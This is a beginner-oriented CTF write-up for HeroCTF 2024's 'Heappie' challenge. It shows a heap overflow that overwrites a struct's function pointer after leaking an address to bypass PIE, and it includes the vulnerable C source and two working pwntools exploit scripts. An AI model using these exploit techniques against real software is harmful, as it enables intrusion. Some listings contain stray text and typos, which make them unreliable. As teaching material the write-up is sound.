Heappie - 64 bits heap exploitation 101 - HeroCTF 2024
This writeup aims at being more on the “tutorial” side, so it’ll contain a lot more details than “traditionnal” writeups. This was also my first heap exploitation ever, and on 64 bits too ! I found this chall to be a really great introduction to heap exploitation, so thanks xanhacks for that ! Also, feedback is MORE than welcomed, please let me know about ANY mistakes i made, stuff i could improve, questions you have, and so on … ;)
Description:
Heappie is a simple application that allows you to save and play your favorite songs.
Find a way to exploit it and read the flag.
Details:
Author: xanhacks
Difficulty: very-easy
Points: 50
Table of contents:
Walkthrough
Checking binary type & protections
-
i prefer to first check the protections in place and the type of binary we’re dealing with, before diving into the source code: this will help me paint a picture of what i can do when i analyse the source code
➜ checksec heappie [*] '/home/kali/secu_classes_ctf/ctf_events/hero_ctf_2024/pwn/Heappie/heappie' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled Stripped: No Debuginfo: Yes ➜ file heappie heappie: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=d8609e05595130735a889757138dd5768389f6b1, for GNU/Linux 3.2.0, with debug_info, not stripped
This tells us: NX ⇒ we cant execute directly on the stack. PIE ⇒ the program base addresss (the address where it is loaded in memory) is randomized each time we run it. The binary is a 64 bits, and isn’t stripped, which means the symbols names havent been removed.
Analysing the source code
-
we find a
win
function, which is the name generally given to functions we need to call to catch the challenges flags:void win() { char flag[64]; FILE* f = fopen("flag.txt", "r"); if (f == NULL) { puts("Flag file is missing!"); exit(1); } fgets(flag, sizeof(flag), f); printf("Flag: %s", flag); fclose(f); }
-
the line
scanf("%s", music->description);
shows thatscanf
is used to write the user input into the elementdescription
of a struct calledmusic
(music->description
) and that no proper boundary check is done. This means we can write in there a string as long as we want … and possibly overflow some memory that we could use.void add_music() { if (playlist_size == playlist_capacity) { playlist_capacity += 10; playlist = realloc(playlist, playlist_capacity * sizeof(Music)); } Music* music = &playlist[playlist_size]; char add_music = 'n'; printf("Do you want to add a sound to the music? (y/n): "); scanf(" %c", &add_music); if (add_music == 'y') { music->play = choose_random_play(); puts("Sound added to the music!"); } else { puts("No sound added to the music!"); } printf("Enter music title: "); scanf("%31s", music->title); printf("Enter music artist: "); scanf("%31s", music->artist); **printf("Enter music description: "); scanf("%s", music->description);** puts("Music added to your playlist!\n"); playlist_size++; }
-
Lets analyse the composition of the
Music
struct:typedef struct Music { void (*play)(struct Music*); char title[32]; char artist[32]; char description[128]; // we'll feed this } Music;
- Let’s say we create one struct name
music_1
. Looking at the struct composition, we see that once we overflow thedescription
element using 128 chars, we will land “out of it”. Now let’s create a second struct, calledmusic_2
… - Question: where will the overflown data from
music_1
be located ? Straight into the first element ofmusic_2
: theplay
pointer. - This means that whatever will be written into
play
, will be identified as a memory address that will, at one point, be executed by the program. - Now i’m thinking about writing the address of the
win
function there. Let’s find a way to call it.
When we create a second struct, it’ll be located in memory, on the heap (malloc and realloc are used to do so, and the space they allocate is on the heap), right after the first one. Hence, overflowing a first struct brings us straight into the second one.
-
for curiosity sake ⇒
play
will be used inplay_music
:void play_music() { int index; printf("Enter music index: "); scanf("%d", &index); if (index < 0 || index >= playlist_size) { puts("Invalid index!\n"); return; } Music* music = &playlist[index]; if (music->play == NULL) { puts("No sound for this music!\n"); return; } gories music->play(music); }
Plan Idea
- We are thinking of:
- filling a first
Music
structdescription
element with 128 characters (to cover the whole 128 bytes space dedicated) which will get us at the end of the said struct. - Adding another 8 bytes to get them into the second struct first element:
play
. Those 8 bytes will contain the address of thewin
function - running the proper music index, and get our flag.
- filling a first
- Now, lets play a bit with the program to better understand its behaviour …
Interacting with the program
heappie
greets us with this menu:
- When we add a music, two options are offered:
Do you want to add a sounds to the music? (y/n):
let’s chosen
first:
- then we’re asked to add a title, an artist, and a description
when done, the original menu shows up again
- lets use option
4. Show playlist
(nil)
appears, which means that at one point, NULL
has been returned
-
lets check whats being used to output this:
void show_playlist() { if (playlist_size == 0) { puts("Your playlist is empty!\n"); return; } puts("Your playlist:"); for (int i = 0; i < playlist_size; i++) { Music* music = &playlist[i]; printf("\t%d. %s by %s (song: %p)\n", i + 1, music->title, music->artist, music->play); } }
-
ok, lets repeat the whole process by adding another music, but this time, let’s add a sound to see what happens:
0x556949c7d2e9
is the address of music->play
(remember the printf
in show_playlist()
)
- ok done, now lets play the first music:
no sound added, no music …
- lets play the second music we’ve added:
- now lets try filling into
description
128 chars A + 4 chars B, create a second struct, and see if the address displayed contains our B’s. Lets do that without a script:
good ! our B’s landed on the second music struct
play
pointer. Also, the segfault when running 0x42424242
confirms that what is overflown into play
is being run. So if we can get the win() address and drop it there, we should be good ;)
Alright, done … now what did we see ? We have the confirmation that we can overwrite the content a struct from a previous one. Our goal is to drop the
win
address inplay
and get it called/run to display the flag. When we add a sound, the address of theplay
pointer is printed, and the printed address is also whats being run. Good, now lets find out how to get thewin
address.
Leaking addresses
-
we know the binary isn’t stripped, which means we can easily retrieve the
win
function:➜ objdump -D -M intel ./heappie | grep win 00000000000011f9 <win>: 1223: 75 19 jne 123e <win+0x45> ➜ readelf -s ./heappie | grep win 41: 00000000000011f9 132 FUNC GLOBAL DEFAULT 15 win
-
we have the offset of win, but what we want is its address. Also we know that the base address of the program is randomized each time the program is run …
We need to be able to get the win address at runtime. What this means is: we need a script that will run
heappie
and, while it runs, will collec thewin
address, choose the2. Play music
option,win
is called and we have our flag
Final plan:
- we need a script that will:
- create a first music struct that we will use to leak an address through the
y
option - create a second struct that we will use to overflow the memory
- create a third struct that will inherit from the
win
runtime address brought into itsplay
element - run the third music to “trigger” the
win
function and read the flag - all this needs to happen when the program is running
- create a first music struct that we will use to leak an address through the
How to get the program base address at runtime to find the win() address:
- What we have collected:
- an offset of
win
, lets call itwin_offset
play_1
address.
- an offset of
- But we want the address of
win
. The idea is this:- in order to get the
win
address, we need the PROGRAM base address first … - once we have it, we add the offset of
win
and poof, we have thewin
address
- in order to get the
- How do we get the
win
address ?- find the offset of
play_1
using pwntools - substract the ADDRESS of
play_1
with the OFFSET ofplay_1
to get the base address:program_base_address = play_1_address - play_1_offset
- And calculate the win address:
win_address = program_base_address + win_offset
- find the offset of
Testing locally before testing remotely:
- I was sending commands one by one, to see how the program reacts. My goal was to first make sure everything works, get the flag, and later on clean the script.
- once the first struct was built and the address leaked, the goal was to collect the data output, and parse it using Regex to find the leaked address:
- here are more screenshots of my trials:
Now that we flag locally, lets try remotely
Trying remotely and flag !
- Had to modify line 8 and add lines 24 and 25 in order to receive more data or the program would crash (for obscure reasons to me, would love to better understand that so if anyone reading is willing to explain this to me, i take it ^^)
- For sure was i happy when seeing the flag:
Thats it, we have our flag ! :)
Summary
Heappie allows us to create playlists, which are stored on the heap using malloc()
and realloc()
. Those playlists are structs
called music
and those structs are stored in a “chain” format: one after the other. The last struct element: description
; doesn’t limit the input of the user, which allowed us to overflow the first element of the following music
struct: *play
; which was run when chosing the Play music
option. We overwrote it with the address of the win()
function, played the music, and got our flag.
Further reflections
- Why does
[*] Switching to interactive mode
appears after the address are being printed and BEFORE the output of the commands we sent ?”- The reason is that when the payload we send makes us switch to interactive mode, our commands have actually ALREADY been sent (
p.interactive()
is at the end of the script we use right ? So the script runs, prints what we asked it to print, then switches to interactive mode and shows us the output of the commands. Easy peasy ^^
- The reason is that when the payload we send makes us switch to interactive mode, our commands have actually ALREADY been sent (
- sometimes the program was crashing and sometimes not ⇒ the reason is because
ASLR
is enabled on the remote machine.ASLR
is also random itself, meaning that sometimes the address that will be loaded is invalid/in-use and therefore, the program crashes when trying to run something there.
you can see few crashes here
Retex
I did a bit of binary exploitation before (only abusing stacks and 32 bits) so this was my first ever heap exploitation. I was REALLY pleased about how much of a good introduction this was to me.
It probably took me 6-8 hours, with the last moment being me screaming with excitment when seeing the flag ^^
Source code and solver
Source code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
typedef struct Music {
void (*play)(struct Music*);
char title[32];
char artist[32];
char description[128];
} Music;
Music* playlist = NULL;
int playlist_size = 0;
int playlist_capacity = 0;
void win() {
char flag[64];
FILE* f = fopen("flag.txt", "r");
if (f == NULL) {
puts("Flag file is missing!");
exit(1);
}
fgets(flag, sizeof(flag), f);
printf("Flag: %s", flag);
fclose(f);
}
void play_1(Music* music) {
printf("Playing music 1: %s by %s\n", music->title, music->artist);
}
void play_2(Music* music) {
printf("Playing music 2: %s by %s\n", music->title, music->artist);
}
void play_3(Music* music) {
printf("Playing music 3: %s by %s\n", music->title, music->artist);
}
void* choose_random_play() {
int choice = rand() % 3;
switch(choice) {
case 0:
return (void*)play_1;
case 1:
return (void*)play_2;
case 2:
return (void*)play_3;
}
return NULL;
}
void show_playlist() {
if (playlist_size == 0) {
puts("Your playlist is empty!\n");
return;
}
puts("Your playlist:");
for (int i = 0; i < playlist_size; i++) {
Music* music = &playlist[i];
printf("\t%d. %s by %s (song: %p)\n", i + 1, music->title, music->artist, music->play);
}
}
void add_music() {
if (playlist_size == playlist_capacity) {
playlist_capacity += 10;
playlist = realloc(playlist, playlist_capacity * sizeof(Music));
}
Music* music = &playlist[playlist_size];
char add_music = 'n';
printf("Do you want to add a sound to the music? (y/n): ");
scanf(" %c", &add_music);
if (add_music == 'y') {
music->play = choose_random_pla();
puts("Sound added to the music!");
} else {
puts("No sound added to the music!");
}
printf("Enter music title: ");
scanf("%31s", music->title);
printf("Enter music artist: ");
scanf("%31s", music->artist);
printf("Enter music description: ");
scanf("%s", music->description);
puts("Music added to your playlist!\n");
playlist_size++;
}
void play_music() {
int index;
printf("Enter music index: ");
scanf("%d", &index);
if (index < 0 || index >= playlist_size) {
puts("Invalid index!\n");
return;
}
Music* music = &playlist[index];
if (music->play == NULL) {
puts("No sound for this music!\n");
return;
}
music->play(music);
}
void delete_music() {
int index;
printf("Enter music index: ");
scanf("%d", &index);
if (index < 0 || index >= playlist_size) {
puts("Invalid index!\n");
return;
}
Music* music = &playlist[index];
memset(music, 0, sizeof(Music));
for (int i = index; i < playlist_size - 1; i++) {
playlist[i] = playlist[i + 1];
}
puts("Music deleted from your playlist!\n");
playlist_size--;
}
void setup() {
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 2, 0);
puts("============================================");
puts("=> Welcome to Heappie <=");
puts("============================================");
puts("Fill your playlist with your favorite music!");
puts("");
<img src="../images/" alt="1"/>{: .align-center}
puts("Examples:");
puts("\t1. Imagine by John Lennon");
puts("\t2. Blowin' in the Wind by Bob Dylan");
puts("\t3. Aquarius/Let the Sunshine In by The 5th Dimension");
puts("");
}
int main() {
srand(time(NULL));
setup();
while(1) {
puts("1. Add music");
puts("2. Play music");
puts("3. Delete music");
puts("4. Show playlist");
printf(">> ");
int choice;
scanf("%d", &choice);
switch(choice) {
case 1:
add_music();
break;
case 2:
play_music();
break;
case 3:
delete_music();
break;
case 4:
show_playlist();
break;
default:
puts("Invalid choice!\n");
break;
}
}
free(playlist);
return 0;
}
Dirty solver i used to flag
#!/home/kali/.venv/bin/python3
from pwn import *
import re
exe = './heappie'
elf = ELF(exe, checksec=False)
p = remote('pwn.heroctf.fr', 6000)
win_offset = elf.symbols['win']
# filling a first struct to leak an address:
p.sendline(b'1')
p.sendline(b'y')
p.sendline(b'play_1')
p.sendline(b'0')
p.sendline(b'biboup')
# leak address
p.sendline(b'4')
# collect data to parse it (numbers are random, i kept increasing the received data until i had an output i could parse)
data = p.recv(8192).decode()
# i added those "random" lines bcz i just wanted to flag and eat xD, it worked so i was good with it lol and figured ok lets come back to it later:
data += p.recv(8192*10).decode()
data += p.recv(8192*10).decode()
print(f"###\ndata received: {data}\n###")
# look for pattern using re.search(pattern, string, flags=0)
matches = re.search('song: (0x[0-9A-Fa-f]+)', data)
print(f"matches: type: {type(matches)}, value: {matches}")
matches = str(matches.group(0))[6:]
if matches:
play_1_addr = int(matches, 16)
print(f"leaked play_1_addr: {hex(play_1_addr)}")
else:
print("found nothing")
# getting win_runtime_addr:
play_1_offset = elf.symbols['play_1']
print(f"play_1_offset: {hex(play_1_offset)}")
base_addr = play_1_addr - play_1_offset
print(f"base_addr: {hex(base_addr)}")
win_runtime_addr = base_addr + win_offset
print(f"win_runtime_addr: {hex(win_runtime_addr)}")
# overflowing struct:
p.sendline(b'1')
p.sendline(b'n')
p.sendline(b'play_2')
p.sendline(b'1')
p.sendline(b'A' * 128 + p64(win_runtime_addr))
# struct containing p64(win_runtime_addr)
p.sendline(b'1')
p.sendline(b'n')
p.sendline(b'play_3')
p.sendline(b'2')
p.sendline(b'eeee')
# now play_3 contains the win runtime address
p.sendline(b'2')
p.sendline(b'2')
p.interactive()
A bit less dirty solver
#!/home/kali/.venv/bin/python3
from pwn import ELF, remote, context, p64
import re
exe = './heappie'
elf = context.binary = ELF(exe, checksec=False)
p = remote('pwn.heroctf.fr', 6000)
# filling a first struct to leak an address:
p.sendline(b'1')
p.sendline(b'y')
p.sendline(b'play_1')
p.sendline(b'0')
p.sendline(b'biboup')
# leak address
p.sendline(b'4')
# collect data to parse it (numbers are random, i kept increasing the received data until i had an output i could parse)
data = p.recv(8192*10).decode()
data += p.recv(8192*10).decode()
data += p.recv(8192*10).decode()
# collect the leaked address
matches = re.search('song: (0x[0-9A-Fa-f]+)', data)
matches = str(matches.group(0))[6:]
if matches:
play_1_addr = int(matches, 16)
print(f"play_1_addr: {hex(play_1_addr)}")
else:
print("found nothing")
# getting win_runtime_addr:
play_1_offset = elf.symbols['play_1']
print(f"play_1_offset: {hex(play_1_offset)}")
elf_base_addr = play_1_addr - play_1_offset
print(f"elf_base_addr: {hex(elf_base_addr)}")
win_offset = elf.symbols['win']
win_runtime_addr = elf_base_addr + win_offset
print(f"win_runtime_addr: {hex(win_runtime_addr)}")
# overflowing second struct:
p.sendline(b'1')
p.sendline(b'n')
p.sendline(b'play_2')
p.sendline(b'1')
p.sendline(b'A' * 128 + p64(win_runtime_addr))
# third struct containing win_runtime_addr
p.sendline(b'1')
p.sendline(b'n')
p.sendline(b'play_3')
p.sendline(b'2')
p.sendline(b'eeee')
p.sendline(b'2') # chose '2. play music'
p.sendline(b'2') # play it to call win()
# grabbing data received
data = p.recv(8192).decode()
# parsing it to isolate the flag:
matches = re.search(r'Hero\{[^}]+\}', data)
matches = str(matches.group(0))
if matches:
flag = matches
print(f'flag found: {flag}')
else:
print('flag not found')
# closing the connection:
p.close()
Acknowledgements:
Some people re-read the draft but none wanted to be cited so nothing to see here.